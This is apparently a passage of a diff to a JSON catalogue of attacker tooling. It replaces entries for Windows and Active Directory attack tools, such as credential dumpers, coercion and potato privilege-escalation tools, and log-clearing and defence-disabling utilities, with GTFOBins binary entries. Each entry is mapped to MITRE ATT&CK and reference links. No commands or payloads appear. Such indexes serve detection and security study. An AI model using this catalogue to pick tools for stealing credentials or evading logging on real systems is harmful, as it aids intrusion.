.mitre.org/techniques/T1556/001/"],"count":10},{"id":"wadcoms:Nanodump","name":"Nanodump","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/fortra/nanodump","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"count":1},{"id":"wadcoms:Nltest","name":"Nltest","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)","https://attack.mitre.org/techniques/T1482/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"count":1},{"id":"wadcoms:noPac","name":"noPac","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/Ridter/noPac","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"count":2},{"id":"wadcoms:PowerMad","name":"PowerMad","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/Kevin-Robertson/Powermad","https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation"],"count":1},{"id":"wadcoms:PowerUpSQL","name":"PowerUpSQL","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/NetSPI/PowerUpSQL","https://www.netspi.com/blog/technical-blog/network-penetration-testing/how-to-hack-database-links-in-sql-server/","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server","https://www.netspi.com/blog/technical-blog/network-penetration-testing/finding-sensitive-data-domain-sql-servers-powerupsql/","https://www.netspi.com/blog/technical-blog/network-penetration-testing/establishing-registry-persistence-via-sql-server-powerupsql/"],"count":3},{"id":"wadcoms:PowerView","name":"PowerView","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://www.thehacker.recipes/ad/movement/dacl/","https://www.thehacker.recipes/ad/movement/dacl/grant-rights.html","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://wald0.com/?p=112","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast"],"count":11},{"id":"wadcoms:pre2k","name":"pre2k","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/garrettfoster13/pre2k","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"count":2},{"id":"wadcoms:PrinterBug","name":"PrinterBug","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/dirkjanm/krbrelayx","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-rprn"],"count":1},{"id":"wadcoms:PrintSpoofer","name":"PrintSpoofer","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/itm4n/PrintSpoofer","https://itm4n.github.io/printspoofer-abusing-impersonation-privileges/","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"count":1},{"id":"wadcoms:Procdump","name":"Procdump","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"count":1},{"id":"wadcoms:pyGPOAbuse","name":"pyGPOAbuse","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/Hackndo/pyGPOAbuse","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://attack.mitre.org/techniques/T1484/001/"],"count":1},{"id":"wadcoms:Pypykatz","name":"Pypykatz","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/skelsec/pypykatz","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"count":1},{"id":"wadcoms:RoguePotato","name":"RoguePotato","source":"DAEMON","platform":["Windows","Linux","ActiveDirectory"],"references":["https://github.com/antonioCoco/RoguePotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"count":1},{"id":"wadcoms:sam","name":"sam","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/WazeHell/sam-the-admin","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing"],"count":1},{"id":"wadcoms:ShadowCoerce","name":"ShadowCoerce","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/ShutdownRepo/ShadowCoerce","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-fsrvp"],"count":1},{"id":"wadcoms:SharpChrome","name":"SharpChrome","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/GhostPack/SharpDPAPI","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1555/003/"],"count":1},{"id":"wadcoms:SharpDPAPI","name":"SharpDPAPI","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/GhostPack/SharpDPAPI","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords","https://attack.mitre.org/techniques/T1555/004/"],"count":1},{"id":"wadcoms:SharpGPOAbuse","name":"SharpGPOAbuse","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/FSecureLABS/SharpGPOAbuse","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://attack.mitre.org/techniques/T1484/001/"],"count":2},{"id":"wadcoms:SharpView","name":"SharpView","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/tevora-threat/SharpView","https://github.com/PowerShellMafia/PowerSploit","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"count":1},{"id":"wadcoms:SpoolSample","name":"SpoolSample","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/leechristensen/SpoolSample","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-rprn"],"count":1},{"id":"wadcoms:SweetPotato","name":"SweetPotato","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/CCob/SweetPotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"count":1},{"id":"wadcoms:Whisker","name":"Whisker","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/eladshamir/Whisker","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab"],"count":1},{"id":"daemon:kubectl","name":"kubectl","source":"DAEMON","platform":["Linux","Windows"],"references":["https://attack.mitre.org/techniques/T1609/","https://kubernetes.io/docs/reference/kubectl/generated/kubectl_exec/"],"count":9},{"id":"daemon:crictl","name":"crictl","source":"DAEMON","platform":["Linux"],"references":["https://kubernetes.io/docs/tasks/debug/debug-cluster/crictl/","https://attack.mitre.org/techniques/T1609/"],"count":2},{"id":"daemon:ctr","name":"ctr","source":"DAEMON","platform":["Linux"],"references":["https://hacktricks.wiki/en/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.html","https://attack.mitre.org/techniques/T1611/"],"count":1},{"id":"daemon:runc","name":"runc","source":"DAEMON","platform":["Linux"],"references":["https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation","https://attack.mitre.org/techniques/T1611/"],"count":1},{"id":"daemon:docker","name":"docker","source":"DAEMON","platform":["Linux"],"references":["https://docs.docker.com/reference/cli/docker/container/export/","https://docs.docker.com/reference/cli/docker/image/save/","https://attack.mitre.org/techniques/T1005/"],"count":1},{"id":"daemon:nerdctl","name":"nerdctl","source":"DAEMON","platform":["Linux"],"references":["https://github.com/containerd/nerdctl/blob/main/docs/command-reference.md","https://attack.mitre.org/techniques/T1611/"],"count":1},{"id":"daemon:msiexec","name":"msiexec.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Msiexec.yml","https://attack.mitre.org/techniques/T1218/007/"],"count":1},{"id":"daemon:curl","name":"curl.exe","source":"DAEMON","platform":["Windows","Linux","macOS"],"references":["https://curl.se/docs/manpage.html","https://curl.se/windows/"],"count":1},{"id":"daemon:tar","name":"tar.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Tar.yml","https://learn.microsoft.com/en-us/windows/tar/"],"count":1},{"id":"daemon:ssh","name":"ssh.exe","source":"DAEMON","platform":["Windows","Linux","macOS"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Ssh.yml","https://attack.mitre.org/techniques/T1202/"],"count":1},{"id":"daemon:scp","name":"scp.exe","source":"DAEMON","platform":["Windows","Linux","macOS"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Scp.yml","https://attack.mitre.org/techniques/T1202/"],"count":1},{"id":"daemon:msedge","name":"msedge.exe","source":"DAEMON","platform":["Windows","macOS","Linux"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Msedge.yml","https://twitter.com/mrd0x/status/1478234484881436672"],"count":1},{"id":"daemon:mpcmdrun","name":"MpCmdRun.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/MpCmdRun.yml","https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-ironically-be-used-to-download-malware/"],"count":1},{"id":"daemon:desktopimgdownldr","name":"desktopimgdownldr.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Desktopimgdownldr.yml","https://www.sentinelone.com/labs/living-off-windows-land-a-new-native-file-downldr/"],"count":1},{"id":"daemon:appinstaller","name":"AppInstaller.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/AppInstaller.yml","https://attack.mitre.org/techniques/T1105/"],"count":1},{"id":"daemon:onedrivestandaloneupdater","name":"OneDriveStandaloneUpdater.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/OneDriveStandaloneUpdater.yml","https://attack.mitre.org/techniques/T1105/"],"count":1},{"id":"daemon:finger","name":"finger.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Finger.yml","https://attack.mitre.org/techniques/T1105/"],"count":1},{"id":"daemon:wsl","name":"wsl.exe","source":"DAEMON","platform":["Windows","Linux"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Wsl.yml","https://attack.mitre.org/techniques/T1202/"],"count":1},{"id":"daemon:winget","name":"winget.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Winget.yml","https://learn.microsoft.com/en-us/windows/package-manager/winget/install"],"count":1},{"id":"daemon:devtunnel","name":"devtunnel.exe","source":"DAEMON","platform":["Windows","Linux","macOS"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/devtunnels/","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/cli-commands"],"count":1},{"id":"daemon:teams","name":"Teams.exe","source":"DAEMON","platform":["Windows","macOS","Linux"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Teams.yml","https://attack.mitre.org/techniques/T1218/015/"],"count":1},{"id":"daemon:diskshadow","name":"diskshadow.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Diskshadow.yml","https://attack.mitre.org/techniques/T1003/003/"],"count":1},{"id":"daemon:wevtutil","name":"wevtutil.exe","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1070/001/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil"],"count":2},{"id":"daemon:powershell","name":"Clear-EventLog","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1070/001/","https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/clear-eventlog"],"count":6},{"id":"daemon:auditpol","name":"auditpol.exe","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1562/002/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol"],"count":1},{"id":"daemon:fsutil","name":"fsutil.exe","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1070/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn"],"count":1},{"id":"daemon:attrib","name":"attrib.exe","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1564/001/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/attrib"],"count":1},{"id":"daemon:reg","name":"reg.exe","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1562/001/","https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-disableantispyware"],"count":1},{"id":"daemon:netsh","name":"netsh.exe","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1562/004/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/netsh-advfirewall"],"count":1},{"id":"daemon:byovd","name":"BYOVD (vulnerable driver)","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1068/","https://www.loldrivers.io/"],"count":1}] -\ No newline at end of file +[{"id":"gtfo:7z","name":"7z","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/7z/"],"count":2},{"id":"gtfo:R","name":"R","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/R/"],"count":3},{"id":"gtfo:aa-exec","name":"aa-exec","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/aa-exec/"],"count":3},{"id":"gtfo:ab","name":"ab","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ab/"],"count":6},{"id":"gtfo:acr","name":"acr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/acr/"],"count":3},{"id":"gtfo:agetty","name":"agetty","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/agetty/"],"count":1},{"id":"gtfo:alpine","name":"alpine","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/alpine/"],"count":3},{"id":"gtfo:ansible-playbook","name":"ansible-playbook","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ansible-playbook/"],"count":2},{"id":"gtfo:ansible-test","name":"ansible-test","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ansible-test/"],"count":2},{"id":"gtfo:aoss","name":"aoss","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/aoss/"],"count":2},{"id":"gtfo:apache2","name":"apache2","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/apache2/"],"count":6},{"id":"gtfo:apache2ctl","name":"apache2ctl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/apache2ctl/"],"count":2},{"id":"gtfo:apport-cli","name":"apport-cli","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/apport-cli/"],"count":1},{"id":"gtfo:apt-get","name":"apt-get","source":"GTFOBins","platform":["Linux"],"aliases":["apt"],"references":["https://gtfobins.github.io/gtfobins/apt-get/"],"count":6},{"id":"gtfo:aptitude","name":"aptitude","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/aptitude/"],"count":2},{"id":"gtfo:ar","name":"ar","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ar/"],"count":3},{"id":"gtfo:arch-nspawn","name":"arch-nspawn","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/arch-nspawn/"],"count":1},{"id":"gtfo:aria2c","name":"aria2c","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/aria2c/"],"count":12},{"id":"gtfo:arj","name":"arj","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/arj/"],"count":6},{"id":"gtfo:arp","name":"arp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/arp/"],"count":3},{"id":"gtfo:as","name":"as","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/as/"],"count":3},{"id":"gtfo:ascii-xfr","name":"ascii-xfr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ascii-xfr/"],"count":3},{"id":"gtfo:ascii85","name":"ascii85","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ascii85/"],"count":2},{"id":"gtfo:ash","name":"ash","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ash/"],"count":6},{"id":"gtfo:aspell","name":"aspell","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/aspell/"],"count":6},{"id":"gtfo:asterisk","name":"asterisk","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/asterisk/"],"count":3},{"id":"gtfo:at","name":"at","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/at/"],"count":4},{"id":"gtfo:atobm","name":"atobm","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/atobm/"],"count":3},{"id":"gtfo:autoconf","name":"autoconf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/autoconf/"],"count":2},{"id":"gtfo:autoheader","name":"autoheader","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/autoheader/"],"count":2},{"id":"gtfo:autoreconf","name":"autoreconf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/autoreconf/"],"count":2},{"id":"gtfo:aws","name":"aws","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/aws/"],"count":5},{"id":"gtfo:base32","name":"base32","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/base32/"],"count":3},{"id":"gtfo:base58","name":"base58","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/base58/"],"count":2},{"id":"gtfo:base64","name":"base64","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/base64/"],"count":3},{"id":"gtfo:basenc","name":"basenc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/basenc/"],"count":3},{"id":"gtfo:basez","name":"basez","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/basez/"],"count":3},{"id":"gtfo:bash","name":"bash","source":"GTFOBins","platform":["Linux","macOS"],"aliases":["ksh"],"references":["https://gtfobins.github.io/gtfobins/bash/"],"count":33},{"id":"gtfo:bashbug","name":"bashbug","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bashbug/"],"count":2},{"id":"gtfo:batcat","name":"batcat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/batcat/"],"count":3},{"id":"gtfo:bbot","name":"bbot","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bbot/"],"count":2},{"id":"gtfo:bc","name":"bc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bc/"],"count":3},{"id":"gtfo:bconsole","name":"bconsole","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bconsole/"],"count":5},{"id":"gtfo:bee","name":"bee","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bee/"],"count":3},{"id":"gtfo:borg","name":"borg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/borg/"],"count":2},{"id":"gtfo:bpftrace","name":"bpftrace","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bpftrace/"],"count":3},{"id":"gtfo:bridge","name":"bridge","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bridge/"],"count":3},{"id":"gtfo:bundle","name":"bundle","source":"GTFOBins","platform":["Linux"],"aliases":["bundler"],"references":["https://gtfobins.github.io/gtfobins/bundle/"],"count":10},{"id":"gtfo:busctl","name":"busctl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/busctl/"],"count":9},{"id":"gtfo:busybox","name":"busybox","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/busybox/"],"count":8},{"id":"gtfo:byebug","name":"byebug","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/byebug/"],"count":2},{"id":"gtfo:bzip2","name":"bzip2","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bzip2/"],"count":3},{"id":"gtfo:cabal","name":"cabal","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cabal/"],"count":3},{"id":"gtfo:cancel","name":"cancel","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cancel/"],"count":3},{"id":"gtfo:capsh","name":"capsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/capsh/"],"count":3},{"id":"gtfo:cargo","name":"cargo","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cargo/"],"count":2},{"id":"gtfo:cat","name":"cat","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cat/"],"count":3},{"id":"gtfo:cdist","name":"cdist","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cdist/"],"count":2},{"id":"gtfo:certbot","name":"certbot","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/certbot/"],"count":2},{"id":"gtfo:chattr","name":"chattr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/chattr/"],"count":2},{"id":"gtfo:check_by_ssh","name":"check_by_ssh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_by_ssh/"],"count":2},{"id":"gtfo:check_cups","name":"check_cups","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_cups/"],"count":2},{"id":"gtfo:check_log","name":"check_log","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_log/"],"count":4},{"id":"gtfo:check_memory","name":"check_memory","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_memory/"],"count":2},{"id":"gtfo:check_raid","name":"check_raid","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_raid/"],"count":2},{"id":"gtfo:check_ssl_cert","name":"check_ssl_cert","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_ssl_cert/"],"count":2},{"id":"gtfo:check_statusfile","name":"check_statusfile","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_statusfile/"],"count":2},{"id":"gtfo:chmod","name":"chmod","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/chmod/"],"count":2},{"id":"gtfo:choom","name":"choom","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/choom/"],"count":3},{"id":"gtfo:chown","name":"chown","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/chown/"],"count":2},{"id":"gtfo:chroot","name":"chroot","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/chroot/"],"count":2},{"id":"gtfo:chrt","name":"chrt","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/chrt/"],"count":3},{"id":"gtfo:clamscan","name":"clamscan","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/clamscan/"],"count":3},{"id":"gtfo:clisp","name":"clisp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/clisp/"],"count":3},{"id":"gtfo:cmake","name":"cmake","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cmake/"],"count":4},{"id":"gtfo:cmp","name":"cmp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cmp/"],"count":3},{"id":"gtfo:cobc","name":"cobc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cobc/"],"count":3},{"id":"gtfo:code","name":"code","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/code/"],"count":6},{"id":"gtfo:codex","name":"codex","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/codex/"],"count":2},{"id":"gtfo:column","name":"column","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/column/"],"count":3},{"id":"gtfo:comm","name":"comm","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/comm/"],"count":3},{"id":"gtfo:composer","name":"composer","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/composer/"],"count":2},{"id":"gtfo:cowsay","name":"cowsay","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cowsay/"],"count":2},{"id":"gtfo:cowthink","name":"cowthink","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cowthink/"],"count":2},{"id":"gtfo:cp","name":"cp","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cp/"],"count":10},{"id":"gtfo:cpan","name":"cpan","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cpan/"],"count":2},{"id":"gtfo:cpio","name":"cpio","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cpio/"],"count":10},{"id":"gtfo:cpulimit","name":"cpulimit","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cpulimit/"],"count":3},{"id":"gtfo:crash","name":"crash","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/crash/"],"count":5},{"id":"gtfo:crontab","name":"crontab","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/crontab/"],"count":4},{"id":"gtfo:csh","name":"csh","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/csh/"],"count":6},{"id":"gtfo:csplit","name":"csplit","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/csplit/"],"count":6},{"id":"gtfo:csvtool","name":"csvtool","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/csvtool/"],"count":9},{"id":"gtfo:ctr","name":"ctr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ctr/"],"count":2},{"id":"gtfo:cupsfilter","name":"cupsfilter","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cupsfilter/"],"count":3},{"id":"gtfo:curl","name":"curl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/curl/"],"count":21},{"id":"gtfo:cut","name":"cut","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cut/"],"count":3},{"id":"gtfo:dash","name":"dash","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobi